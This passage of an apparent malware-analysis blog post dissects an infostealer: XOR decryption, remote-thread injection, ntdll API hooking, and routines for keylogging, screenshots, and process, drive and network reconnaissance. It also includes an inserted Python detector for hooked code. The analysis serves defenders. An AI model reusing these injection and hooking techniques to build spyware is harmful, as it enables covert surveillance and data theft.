<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> </span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> Next, it sets up a file named “sortxxxx.nls” (where “xxxx” is a string generated from GetTickCount), to which the modules of the infostealer component (9a9e77d2b7792fbbddcd7ce05a4eb26e) will be copied afterwards.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI2HYQ4SB7fQaEl-N4b0ofdEL-SQSojq9mxI9HAoV6VzAWA_qs38fioU6MXI5n0rb6hKBGZ3bU3JbqwTgDVB-V0kqopUeVwwJTNLKB6Gso7LQCai8qWRjspi_Td4AtjX0LjwtaiUN_/s1600/prepare_sortxxx_nls.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI2HYQ4SB7fQaEl-N4b0ofdEL-SQSojq9mxI9HAoV6VzAWA_qs38fioU6MXI5n0rb6hKBGZ3bU3JbqwTgDVB-V0kqopUeVwwJTNLKB6Gso7LQCai8qWRjspi_Td4AtjX0LjwtaiUN_/s320/prepare_sortxxx_nls.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 17: Preparing “sortxxxx.nls”.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> This is followed by decrypting more of its code at target location 0x00401080 using a simple XOR with 0x89719922 as the key (XOR EAX, 0x89719922).</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXnIZ3zUnYvT9yniq5A18c0jf_rdnk3rmKoQ5-hzGSXzSBs0pTofgBUT9W6FtNMGxmi3moMuGTYJl7R3gnncOIILWmckc5AXtasiR7P-b4eJxZhhNMqDFEAUfFEyVYuzETOluewnQN/s1600/dec_key.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXnIZ3zUnYvT9yniq5A18c0jf_rdnk3rmKoQ5-hzGSXzSBs0pTofgBUT9W6FtNMGxmi3moMuGTYJl7R3gnncOIILWmckc5AXtasiR7P-b4eJxZhhNMqDFEAUfFEyVYuzETOluewnQN/s320/dec_key.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 18: Decrypting more code, 0x89719922 as decryption key.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It then calls the CreateRemoteThread API to create a thread that executes the newly decrypted code at 0x00401080. The newly created thread maps a copy of the malicious DLL component (9a9e77d2b7792fbbddcd7ce05a4eb26e) into memory (remember sortxxxx.nls?).</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifW8pTcLeuKlpaFHIOzTTXI0UdxnThIuvBt9sPoVpVZOHWEiDeFE6qxuaYrV6xYdA2Q98QDx547EWU3Fni6drEmolr_xkSFCjHIlaZ3rQJUiDlnzAg5uJWtASkdDfOYbnq-1wqqsii/s1600/dll_copytomem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifW8pTcLeuKlpaFHIOzTTXI0UdxnThIuvBt9sPoVpVZOHWEiDeFE6qxuaYrV6xYdA2Q98QDx547EWU3Fni6drEmolr_xkSFCjHIlaZ3rQJUiDlnzAg5uJWtASkdDfOYbnq-1wqqsii/s320/dll_copytomem.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 19: DLL component is copied to memory</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It also demonstrates rootkit capabilities by patching some functions of NTDLL.DLL in memory so that execution is routed to the malware first before being passed on to the actual function(s). Some of the patched functions are:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwMapViewOfSection</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwCreateSection</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwOpenFile</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwClose</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwQueryAttributesFile</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ZwQuerySection</span></div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The figures below demonstrate how code rerouting is done.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Yz2oI6N6l5faQHvaRbmYzQ9WAnhIzwJZYt2wvUQoqF8FuLR9YkUzC1qZ5zdOAwd4bM0WRF5fOlGbgCISxaUzpV7PaVas-FvmrfQrSdizUt0cCE31kbXtSwtmWQo4Zgwd4IpmtLnp/s1600/code_reroute1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Yz2oI6N6l5faQHvaRbmYzQ9WAnhIzwJZYt2wvUQoqF8FuLR9YkUzC1qZ5zdOAwd4bM0WRF5fOlGbgCISxaUzpV7PaVas-FvmrfQrSdizUt0cCE31kbXtSwtmWQo4Zgwd4IpmtLnp/s320/code_reroute1.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 20a: Overwrites 6 bytes of ntdll.dll at 7C90DC55 (NtMapViewOfSection) so that it jumps to malware code instead.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN80Z5Z7YP-62xNw82MfTSnmW7rHdNfeTl8lFXeRPlTpv9GPlxhyphenhyphenlyTendLr0BLBpzAUeDQ9xqFCTXZmXQb7-reasqnRS20c4x551_F862JsxlDMR0J10hmhBZ_YjmGyrXKL90edYz/s1600/code_reroute2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN80Z5Z7YP-62xNw82MfTSnmW7rHdNfeTl8lFXeRPlTpv9GPlxhyphenhyphenlyTendLr0BLBpzAUeDQ9xqFCTXZmXQb7-reasqnRS20c4x551_F862JsxlDMR0J10hmhBZ_YjmGyrXKL90edYz/s320/code_reroute2.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 20b: This is where the patched NtMapViewOfSection jumps to.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
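The two patches shown above (the entry point overwritten with a jump to the injector, Figure 15a, and an ntdll prologue overwritten to reroute an API, Figure 20a) can both be spotted by the same check: does the first instruction at a known location transfer control somewhere it should not? The following Python is an added example, not the blog's or the malware's code; the function names, the PE image, the 0x00A0xxxx "injected module" address and the stub bytes are all constructed for the demonstration, and since the post does not state which 6-byte sequence the sample used, push/ret is only one of the forms decoded.

```python
import struct

def _u16(b, o): return struct.unpack_from("<H", b, o)[0]
def _u32(b, o): return struct.unpack_from("<I", b, o)[0]
def _i32(b, o): return struct.unpack_from("<i", b, o)[0]

def parse_pe32_header(image):
    """Return (entry_point_rva, image_base, size_of_image) from a mapped PE32 image.
    Only the first 0x1000 bytes are needed, the same window the injector reads."""
    if _u16(image, 0) != 0x5A4D:                       # "MZ"
        raise ValueError("missing MZ signature")
    e_lfanew = _u32(image, 0x3C)
    if _u32(image, e_lfanew) != 0x00004550:            # "PE\0\0"
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                            # optional header follows the 20-byte file header
    if _u16(image, opt) != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    return _u32(image, opt + 0x10), _u32(image, opt + 0x1C), _u32(image, opt + 0x38)

def decode_redirect(code, va):
    """Decode an unconditional control transfer at the start of `code`, which is
    located at virtual address `va`. Returns (kind, target) or None if there is none."""
    if len(code) >= 5 and code[0] == 0xE9:                         # jmp rel32
        return "jmp rel32", (va + 5 + _i32(code, 1)) & 0xFFFFFFFF
    if len(code) >= 2 and code[0] == 0xEB:                         # jmp rel8
        return "jmp rel8", (va + 2 + struct.unpack_from("<b", code, 1)[0]) & 0xFFFFFFFF
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:     # push imm32; ret (6 bytes)
        return "push/ret", _u32(code, 1)
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:     # jmp dword ptr [addr]
        return "jmp [mem]", None                                   # target sits behind a pointer
    return None

def check_entry_point(image):
    """Flag an entry point that has been patched to jump out of its own image."""
    ep_rva, base, size = parse_pe32_header(image)
    redirect = decode_redirect(image[ep_rva:ep_rva + 8], base + ep_rva)
    if redirect is None:
        return {"patched": False}
    kind, target = redirect
    outside = target is not None and not (base <= target < base + size)
    return {"patched": True, "kind": kind, "target": target, "outside_image": outside}

def check_prologue(name, code, va):
    """Same test applied to an exported function prologue such as NtMapViewOfSection:
    a control transfer over the first instruction means the API has been hooked."""
    redirect = decode_redirect(code, va)
    return {"function": name, "hooked": redirect is not None,
            "target": redirect[1] if redirect else None}

def build_mapped_image(entry_code):
    """Constructed mapped PE32 image: 0x3000 bytes, base 0x00400000, entry point RVA 0x1000."""
    img = bytearray(0x3000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)               # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", img, 0x84, 0x14C)               # Machine = i386
    struct.pack_into("<H", img, 0x84 + 16, 0xE0)           # SizeOfOptionalHeader
    opt = 0x84 + 20
    struct.pack_into("<H", img, opt, 0x10B)                # PE32 magic
    struct.pack_into("<I", img, opt + 0x10, 0x1000)        # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 0x1C, 0x00400000)    # ImageBase
    struct.pack_into("<I", img, opt + 0x38, 0x3000)        # SizeOfImage
    img[0x1000:0x1000 + len(entry_code)] = entry_code
    return bytes(img)

# Constructed samples: a normal prologue versus an entry point overwritten with
# "jmp 0x00A01080" (the 0x00A0xxxx region stands in for the injected module).
CLEAN_IMAGE = build_mapped_image(b"\x55\x8B\xEC\x83\xEC\x10")
HOLLOWED_IMAGE = build_mapped_image(b"\xE9" + struct.pack("<i", 0x00A01080 - (0x00401000 + 5)))

# Constructed ntdll-style stubs: the usual "mov eax, imm32 / mov edx, 7FFE0300" syscall
# stub versus the same stub with its first 6 bytes replaced by "push imm32; ret".
NT_STUB_CLEAN = b"\xB8\x6C\x00\x00\x00\xBA\x00\x03\xFE\x7F"
NT_STUB_HOOKED = b"\x68\x80\x10\xA0\x00\xC3\xBA\x00\x03\xFE\x7F"

if __name__ == "__main__":
    print(check_entry_point(CLEAN_IMAGE))
    print(check_entry_point(HOLLOWED_IMAGE))
    print(check_prologue("NtMapViewOfSection", NT_STUB_CLEAN, 0x7C90DC55))
    print(check_prologue("NtMapViewOfSection", NT_STUB_HOOKED, 0x7C90DC55))
```

On a live system the same functions would be fed bytes read from the target process (as in Figure 15) and from ntdll's export addresses, compared against the on-disk copies.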
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It then attempts to load “sortxxxx.nls” into memory using the LoadLibraryW function and obtains the address of the 2</span><span style="font-size: 11pt;"><sup>nd</sup></span> <span style="font-size: 11pt;">exported function of the DLL component using GetProcAddress. It then passes execution to export #2 with a call instruction. This is shown in Figure 21.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_2ne7MNzFwF38Rf_ANV-5hVhsid70Dd_3UJjKSByCcxvIbKMj4G78N1RatMuBeCk4YFgWSWX6hbKOakekt4Z4oRggarHHqL_4eJ3JAW5Ukj9Uni1ezCFTr_q1Po_o70jQER46WfK/s1600/dll_func_num2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_2ne7MNzFwF38Rf_ANV-5hVhsid70Dd_3UJjKSByCcxvIbKMj4G78N1RatMuBeCk4YFgWSWX6hbKOakekt4Z4oRggarHHqL_4eJ3JAW5Ukj9Uni1ezCFTr_q1Po_o70jQER46WfK/s320/dll_func_num2.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 21: DLL component export function #2 is now called.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>9a9e77d2b7792fbbddcd7ce05a4eb26e – The Dynamic Link Library Module a.k.a. “The InfoStealer”</i></b></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The DLL component is the one responsible for stealing data from the infected system. It exports 5 functions which can be seen below:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#1 .100026EF - same as #2, a call to entry point</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#2 .10002701 - main (entry point)</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#3 .1000276A - same as #2, create thread to entry point</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#4 .100025BF - infostealer</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">#5 .100025C4 - quit infostealer</span></div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">This DLL module has nine routines in all, dispatched by the command ids below:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">65h @ 0x100032E9: List running processes, look up account details</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiFx9J9V11iZ_VPOfZRJgfXH8pniLcGgSLZBfvlipk80IlzE1EwyBxJMN471RJqtBokZsHHgFRg_YA2Nb1y9_-GjgECw1ocYPzzg0oOvVqny0uqOwJ4Zb4vNvGj_LlMjCXNQjuT9J/s1600/routine_65.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiFx9J9V11iZ_VPOfZRJgfXH8pniLcGgSLZBfvlipk80IlzE1EwyBxJMN471RJqtBokZsHHgFRg_YA2Nb1y9_-GjgECw1ocYPzzg0oOvVqny0uqOwJ4Zb4vNvGj_LlMjCXNQjuT9J/s320/routine_65.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22a: Routine 65h, list running processes including account id.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">66h @ 0x10002F34: List available disk drives including mounted network drives, get drive type (removable, fixed, CD-ROM, RAM disk, or network drive), get volume information (serial number and volume label), and free disk space.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBL_EbtCln48c-lrkMB9WXEsfFlbi0uBu_4dVCkOH4nwPm2uS0nPYXyuzAHg46GuxeU13yOmcT-Pr-0_Hwxv1BQ_giUxy_7pu-2CAbFhLo3HowoTh60fEZh1gvtqrGIiO7BVJe2vu/s1600/routine_66.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZBL_EbtCln48c-lrkMB9WXEsfFlbi0uBu_4dVCkOH4nwPm2uS0nPYXyuzAHg46GuxeU13yOmcT-Pr-0_Hwxv1BQ_giUxy_7pu-2CAbFhLo3HowoTh60fEZh1gvtqrGIiO7BVJe2vu/s320/routine_66.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22b: Routine 66h, list numerous disk information.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">68h @ 0x10003ED0: Take a screenshot</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxELkTJTvcXW8i9igI5c2OXnLfAUY7ESyEPoV7V9OgELnHRBooH5Rn9m1x36LGdFOrnn0K6ePOptX2rHj5oHqfEZqAGwbao04_lTp4bdMuLNoLrMau5d7pYYD2sr4AtJFPSWF1yuT7/s1600/routine_68.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxELkTJTvcXW8i9igI5c2OXnLfAUY7ESyEPoV7V9OgELnHRBooH5Rn9m1x36LGdFOrnn0K6ePOptX2rHj5oHqfEZqAGwbao04_lTp4bdMuLNoLrMau5d7pYYD2sr4AtJFPSWF1yuT7/s320/routine_68.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22c: Routine 68h, a screenshot of “take a screenshot function”.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">69h @ 0x10005248: Get network parameters (hostname, domain name, DNS servers, etc.); retrieve the interface-to-IPv4 address mapping table, the IPv4 routing table, the MIB-II interface table, the IPv4-to-physical address mapping table, the IPv4 TCP connection table and the IPv4 User Datagram Protocol (UDP) listener table; display the DNS cache; and enumerate network connections and resources.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4t2LW1lOP7JD4kf6b0mo5MytQ14G79Uc4kNmJ36xazCbrjtNUPkA__vg2r3xRD4TcgSdfKaejV6FaiOaRjJlqMliLkoljDeZAD1kIrUdZLwhlE-XOfdwPMue2j2wQddNFZZYDoto7/s1600/routine_69.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4t2LW1lOP7JD4kf6b0mo5MytQ14G79Uc4kNmJ36xazCbrjtNUPkA__vg2r3xRD4TcgSdfKaejV6FaiOaRjJlqMliLkoljDeZAD1kIrUdZLwhlE-XOfdwPMue2j2wQddNFZZYDoto7/s320/routine_69.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22d: Routine 69h, retrieve various network information.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">67h @ 0x100052C3: Monitor keyboard strokes</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
